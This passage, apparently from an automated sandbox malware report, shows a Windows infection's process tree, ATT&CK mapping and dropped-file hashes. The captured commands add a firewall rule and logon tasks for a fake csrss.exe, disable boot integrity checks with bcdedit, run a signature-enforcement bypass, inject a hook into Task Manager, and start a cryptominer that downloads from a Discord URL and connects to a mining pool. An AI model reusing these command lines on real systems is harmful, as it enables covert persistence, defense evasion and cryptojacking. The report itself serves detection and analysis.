    PID:2432
  - - C:\Windows\system32\cmd.exe
      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2772
  - - C:\Windows\rss\csrss.exe
      C:\Windows\rss\csrss.exe
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      Manipulates WinMon driver.
      Manipulates WinMonFS driver.
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2896
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        Creates scheduled task(s)
        
        PID:2540
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        5⤵
        
        PID:1740
    - - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        Suspicious use of WriteProcessMemory
        
        PID:1544
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:488
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:2032
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:932
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:2220
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:2248
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:2324
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:636
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:912
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:2200
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:2008
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:2904
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:1476
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:1548
    - - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1272
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\Sysnative\bcdedit.exe /v
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:888
    - - C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        5⤵
        Executes dropped EXE
        
        PID:1536
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        Creates scheduled task(s)
        
        PID:2796
    - - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        5⤵
        Executes dropped EXE
        
        PID:2128
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        6⤵
        
        PID:2320
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        Launches sc.exe
        Suspicious use of AdjustPrivilegeToken
        
        PID:2296
    - - C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=ahrievohz2aiv7Ee -m=https://cdn.discordapp.com/attachments/1210289102486904905/1211762574903877723/FyjjCEEagid?ex=65ef60d7&is=65dcebd7&hm=7d9a74bd2093b634718d663ba89134d88a58fd63129fa37453f5146146e9fc4c& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2036
      - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe -hide 2108
        6⤵
        Executes dropped EXE
        Manipulates WinMon driver.
        
        PID:3020
      - C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id e7478f51-a944-4e3d-a09a-8a36f789b495 --tls --nicehash -o showlock.net:443 --rig-id e7478f51-a944-4e3d-a09a-8a36f789b495 --tls --nicehash -o showlock.net:80 --rig-id e7478f51-a944-4e3d-a09a-8a36f789b495 --nicehash --http-port 3433 --http-access-token e7478f51-a944-4e3d-a09a-8a36f789b495 --randomx-wrmsr=-1
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:2108
    - - C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
        5⤵
        Executes dropped EXE
        
        PID:2132
    - - C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
        5⤵
        Executes dropped EXE
        
        PID:2960
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        Creates scheduled task(s)
        
        PID:904
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        Creates scheduled task(s)
        
        PID:2940
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        Creates scheduled task(s)
        
        PID:1292

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240228133126.log C:\Windows\Logs\CBS\CbsPersist_20240228133126.cab
1⤵
- Drops file in Windows directory
PID:1656

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:1644

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1368

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Service Discovery

T1046

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

Filesize
4.1MB

MD5
0c7b8daa9b09bcdf947a020bf28c2f19

SHA1
738f89f4da5256d14fe11394cf79e42060a7e98b

SHA256
ff0c709f06a8850794f2501c7dc9ce4ffc75f1ab3039218952cd87a067d3d3ff

SHA512
b069ef6d30a5afafc4b4e2632cb4f9da65e58dcedb66706921d85a6be97a024c1e786ec51299ba52668a65fe948d499609aa2b4978fb20738dd0b643d84cbcf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

Filesize
4.1MB

MD5
9a9e27e0d9ad4448b1166ebff136ebf1

SHA1
f387f1a195888c52b6e53804948a010a826aa69d

SHA256
130550ab2008446ef6873eeea72ae46b167e8a6bd28f6f0d45fad1f286524bd2

SHA512
3312e51f3c0c2c5506ed008db48a8d90da140bcac3b9c6fa43158d61687685e6a4c8ebcf7a096ee768246a1a9c9c6986b8f3f860352a8295a808d343cff8ede7

Download Submit
C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

Filesize
1.6MB

MD5
963fff513a717b967a46d139181d1c9f

SHA1
f497500b3ae24414b52dc207e139389ecc1b93f9

SHA256
fc2ba8838c340746c5439a695e2e9f7642b287621403b3a52b465bfb328b7702

SHA512
00921a3198bdc7998da29b158cc08e88206998089bd3348f96e50355d9af4f4299627f6b03033fd2b8ec182492a4718b5bca033e369705016833b42ba3a9bf4a

Download Submit
C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

Filesize
1.1MB

MD5
025b202e237065499033dec440eff434

SHA1
84aeec19d5637c54e76f27d48a8501364b4b1f4b

SHA256
b5ab3d47a8d027110a5bd5aceae480d20a9ded497d40bc91a1c5ab92cd0d381a

SHA512
be4ad59ca3634c17b2f0aef1aa03f93f3b83d3b7a9bf5f505dbf2c2cd0755d00144e5c2f34c3a16c171f2a75c4cbc9b2e8a2f5aac0901faf1d5ec390ff341c8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab9F2E.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

Filesize
8.3MB

MD5
fd2727132edd0b59fa33733daa11d9ef

SHA1
63e36198d90c4c2b9b09dd6786b82aba5f03d29a

SHA256
3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e

SHA512
3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

Filesize
492KB

MD5
fafbf2197151d5ce947872a4b0bcbe16

SHA1
a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020

SHA256
feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71

SHA512
acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarA4A2.tmp

Filesize
175KB

MD5
dd73cead4b93366cf3465c8cd32e2796

SHA1
74546226dfe9ceb8184651e920d1dbfb432b314e

SHA256
a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

SHA512
ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

Filesize
384KB

MD5
8358a4777642ddb6a775596e1bfa0b46

SHA1
c7c3de39d06d6798e2ced3c894812678bbad572f

SHA256
f4d3616dcb14411bf5fde23d3270edafaa4bf86374b6e88c3c587e46917fc06a

SHA512
0723cc04dd80c327c3854f1b3a7ca697d18648c7be65b1962ba4f2b2ea38695ba2d87c4838ade13d6218fed7a2de8ca42e1eafa3e1709d4ee4877a898c3f6ab6

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

Filesize
192KB

MD5
11e474ff79b0a0e42ceec0430ca5215b

SHA1
85e90c170d0be1a99150f056256615993a01a56f

SHA256
5111b7e8c85b3ead9ac2e47792a9ddf4e0b826c3a65d420fbf41deff38339cb9

SHA512
9744e5c35b97fea868542227807380549d013fea09bc66e2c475e6034dd1dccd95d92eeff3152b60cdca420fd7e324bed83e11951fe09015191cd73229e56f2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

Filesize
1.8MB

MD5
8933776bd662b4b95c336cf575d0b6ca

SHA1
f8f74857f262d3b6f3aae18be1b3bd8c5b441ed5

SHA256
3f0050dec5cb036bc0c0dbb7e142f768cc8b27c66f9a7d9fd308e9178ed41fde

SHA512
1d9f356770be759772f90fc4495c61743482a20fa4806a1defcf1e4140dcfc722f4ca5b390d5d6223afc4cc6b3fa23a930af0e904b5aab9c00a71137f50d2b3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

Filesize
1.8MB

MD5
6584fb7f603b867cd6b669832f4ebe8c

SHA1
2fb3de7eaded493e1ec4002cc93c97227e8c0881

SHA256
8b758147d9e1db3f1cba00453ef1f867d3b1c51e2f2927bb95d50454a5be5634

SHA512
397e64fa5e173b097efa4f2d1b8695d6ced84f0fa80b32cf6fd93cf338aea33c40348800cafe2e70c85a84bd7317d6bf5bedd645430529e2923bdc774ac5b01d

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe

Filesize
1.3MB

MD5
7ee06922befabcc01491d8448c240263

SHA1
eb41128c202df36e8db6f92d90e793ad827c5805

SHA256
3e41914b288b5a5af66895babace9ee9463a9d3a72a89388c5b96154289db0f7

SHA512
cedd7ea006814c12bba40a0ed5936f481f5a6037730ef19cd205db11591550a86addad2e40d46890e15d7c913cced43280eee1ebe785e93ee8772ef531f60952

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe

Filesize
256KB

MD5
01a05e8f9207d3c5d79c4f68a92e3d92

SHA1
001664dcd441229277621334fae52ac3e35b835a

SHA256
1316e3da68acbec88860bb94b4b966c522fb797bfbe12a0eda8f6d94819202aa

SHA512
d98e46f1b4e55d0c7013f398ea88bcf8642a40952ef5f5cab92b7c6404c27f85dfb2272329f55d8de1a3e87b79fc3ab503f1642562827be9ad19b039c905943e

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

Filesize
94KB

MD5
d98e78fd57db58a11f880b45bb659767

SHA1
ab70c0d3bd9103c07632eeecee9f51d198ed0e76

SHA256
414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

SHA512
aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

Filesize
281KB

MD5
d98e33b66343e7c96158444127a117f6

SHA1
bb716c5509a2bf345c6c1152f6e3e1452d39d50d

SHA256
5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

SHA512
705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe

Filesize
64KB

MD5
4f0f0a2cde39335f1a59860bcb88d243

SHA1
f1ac1d45bb3b7cb064ceae73b6bb3074e194a6fd

SHA256
28095fbd0a641a93972b23a6de64b6e4de506916420885c239d02d9e5b77525f

SHA512
278133c56076c57c16dbf954d93370140e8f8bc85244122e82ef9f1a821c8d4e337efe54323a9f13ffad43b62c06337b1d9c6a13f11d54a71191a7b2b5d2674f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Filesize
1.6MB

MD5
b0097bb50dfdbec73b0f135ef6532e7b

SHA1
145296d024bb816e14eaf72ba0d6ee5e7e43cf33

SHA256
b66d5e0cd81f0a67a8dfd623b47b9200a7eceb0992a833c94fdf05ad23da6f4d

SHA512
001300337a58c5d0d08d425dc84c0198b1ac5695a28218df43c45c415a3bbadc588f4d2340f51090571ec74258a920f7b94cd6dc1a008bbdb259581883b1dfd1

Download Submit
C:\Users\Admin\AppData\Local\Temp\osloader.exe

Filesize
591KB

MD5
e2f68dc7fbd6e0bf031ca3809a739346

SHA1
9c35494898e65c8a62887f28e04c0359ab6f63f5

SHA256
b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

SHA512
26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

Download Submit
C:\Users\Admin\AppData\Local\Temp\u1f4.1.exe

Filesize
1.7MB

MD5
5b87828ea000c7111084d8beed17175e

SHA1
e8aa3848e39c449051702a333e608fafd2e5330f

SHA256
1a557fae2d39d06392f4bea760fb72c87f0959a7c3ac66865e36f316866f57d3

SHA512
56b0d0e5422b89a4659969f59570962dbb267fde913ed051fbedf3d66653c9c23d15c945a6ae8ce5570af010b3671eb0be085e8afb44c3088def9f423290f385

Download Submit
C:\Users\Admin\AppData\Roaming\Temp\Task.bat

Filesize
128B

MD5
11bb3db51f701d4e42d3287f71a6a43e

SHA1
63a4ee82223be6a62d04bdfe40ef8ba91ae49a86

SHA256
6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331

SHA512
907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2

Download Submit
C:\Windows\rss\csrss.exe

Filesize
704KB

MD5
c47e8a7ea01f602229276b81f1300223

SHA1
5a6a0bc297bd00bf939f0fb9f01b8139be6c5f45

SHA256
828f473fbbc654ecf3d02576f36921dfa0c00d8b7546ed89702a91d56e016531

SHA512
2776091890b1b4b8355e7e2f4f27b89ffd8325597ed6d92ef76e5d1c5d7339021466407cc6a3c32c9b4f42b5fdc99d0be7c145325a8c68c3d21a105cdb3ea189

Download Submit
C:\Windows\windefender.exe

Filesize
2.0MB

MD5
8e67f58837092385dcf01e8a2b4f5783

SHA1
012c49cfd8c5d06795a6f67ea2baf2a082cf8625

SHA256
166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa

SHA512
40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

Download Submit
\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

Filesize
3.9MB

MD5
6d5a3f3f1e930977bf6740e64259ac0d

SHA1
f068e9a9f439f464bee68971c97b24365864ef30

SHA256
35afeb3b483afc92e28ad3980ec1895fe25439ba09a6ab491baa3447869590f6

SHA512
9c9343f93e20dbe14b87af3f1c7970a5cd7ea25c8a9d8fed7ab357b64f748407183cfe020a8afa37e699d90aab31aa187788436bf947f732892d843a2eda10fd

Download Submit
\Users\Admin\AppData\Local\Temp\InstallSetup_four.exe

Filesize
380KB

MD5
0564a9bf638169a89ccb3820a6b9a58e

SHA1
57373f3b58f7cc2b9ea1808bdabb600d580a9ceb

SHA256
9e4b0556f698c9bc9a07c07bf13d60908d31995e0bd73510d9dd690b20b11058

SHA512
36b81c374529a9ba5fcbc6fcfebf145c27a7c30916814d63612c04372556d47994a8091cdc5f78dab460bb5296466ce0b284659c8b01883f7960ab08a1631ea6

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

Filesize
512KB

MD5
e0ec11ae7cfdd0fd87ee154a8b96302d

SHA1
f958445d4b51b698627cb03807ff92a73490fdc2

SHA256
5a2b37fd5eb3bdc5ce524d0c4eaec3ed2d2160ad7f2586d8356a47dc7317f244

SHA512
8bbf80811bff9ca9a7c6f77d48586ed162f34c231ccca086fa91cf722301ed163a0590791d9d2753f38e759a1357fddb8eaf79713698791433188134c9147262

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

Filesize
448KB

MD5
59fcec2226e581042e276afa4e63d65e

SHA1
48a8941d9e7d719b39bfc5ee78700c6251430a98

SHA256
637a3a8fa9c68438403c5d37a95ecf754f971ded846fa5228f2de93ec3eff111

SHA512
33c29af2dda0c3abba4b9e9f34db60f75164f607ad1f2aa6161e54c0c9bbba887aaa5747c985f1f2dfd8af858e3cc48a914864714298a3350d3dee7e4478f985

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

Filesize
2.2MB

MD5
ba2b41ec1925877cd81d34b2af899e61

SHA1
53decd4a513d76811bc4a1b31ca9087c1038fb38

SHA256
168c003d6ab477274e11893fa79ae8679febb18b26540e7c6d6a51349f7999b3

SHA512
e0e2e60dbef1e7164713497db43f536e6f63d23ba75fb5cab2f3828c10f80e80b46f7ba2724d44f3153532d5d7bc88df19d3a0b3a5caac07c38a751dbfe5c23c

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

Filesize
1.9MB

MD5
80db758e1913317d570b0e2896beb713

SHA1
3ea05459f567bf17453c5dac7a83f9c7d26d921d

SHA256
11c5731e390488b5b2aa7ed829974c7345dc056f9f495fba3aed06dea1ee3d0d

SHA512
83a88c9fca1295be9cf00705ef675826513178dc95fb209ae24f31c46164407fa30aa54f665a16c20136b33ec67a84a16268e549b1321093e8b8e5948af24762

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe

Filesize
1.4MB

MD5
a06b56bd05fc353a7d958f994be39e5d

SHA1
afe11ad2f894b549c76045da27a3e55e6516ddbc

SHA256
eae414651eec6691ff2cbfd7ce9c71bf26df6df489d6753d0c2bd30dd859cc17

SHA512
e10c545141772c21c0792f583ebb069febd508f6710c36e56ff7db7f61e9233d4e6aca175ca220df1921406f8d566ff4149aed798ea6554d41318f0e557f581a

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe

Filesize
1.4MB

MD5
c7a5ef6e574ad12349750266dd005ab0

SHA1
25be08f1ff5657a902f68153ac5cb37a04e03912

SHA256
b062ab8381d0e37d4da61d1cda35870f7117d529f3bc9044c9f241863921bc42

SHA512
f0bc0a6c4e4642b6aad408e02f04adbc9a941d9f2113251614da80f53959ab9157e709022a4a613c81a83d6b337da9c664aa342044e5834d3c198b2709cd4790

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Filesize
1.7MB

MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe

Filesize
512KB

MD5
a79458e44bcc971bd3bc3d7d0f957fba

SHA1
d7eca700dc51034d9e2e4301fe16ebf500397f54

SHA256
338f319c91a94672bbf72bcc86e2bcfe30f3d10daa750109e4fc6079c7bb5e29

SHA512
1ecb81524bdd4c737b87c7c60d55eb9c8fc95955274e322257a1a99be5705938adad03c3abd2f14a598b8e45da350bbaf291fe6097fcdf81d3cbab0a6afe377d

Download Submit
\Users\Admin\AppData\Local\Temp\dbghelp.dll

Filesize
1.5MB

MD5
f0616fa8bc54ece07e3107057f74e4db

SHA1
b33995c4f9a004b7d806c4bb36040ee844781fca

SHA256
6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

SHA512
15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Filesize
1.6MB

MD5
fbd469a278c5643bc42508f66f044dcf

SHA1
59ba11c56703d3ba7b430b058aa031d36697eb5f

SHA256
adf51a359b56e7798742252a4abc630c3bed4c019c55db093a82df0018909e2e

SHA512
ca4eecdcbf5148a2f2ba0e16ab46115917cbb115d437a251c9c3474e264c8fd19bc40b226a112bc655337b47387c5a73d95b04cb9896fe3f650a4158978dc429

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Filesize
1.8MB

MD5
32b80942527550e2750fa36ee275a4c4

SHA1
46d3c93fd6fb4ded69ef93ea9e97b7aea15f5bee

SHA256
9c2741e35c2870ef0b5a118e013608a4f7dec831f7801bf534f9bb1f5792eaa4

SHA512
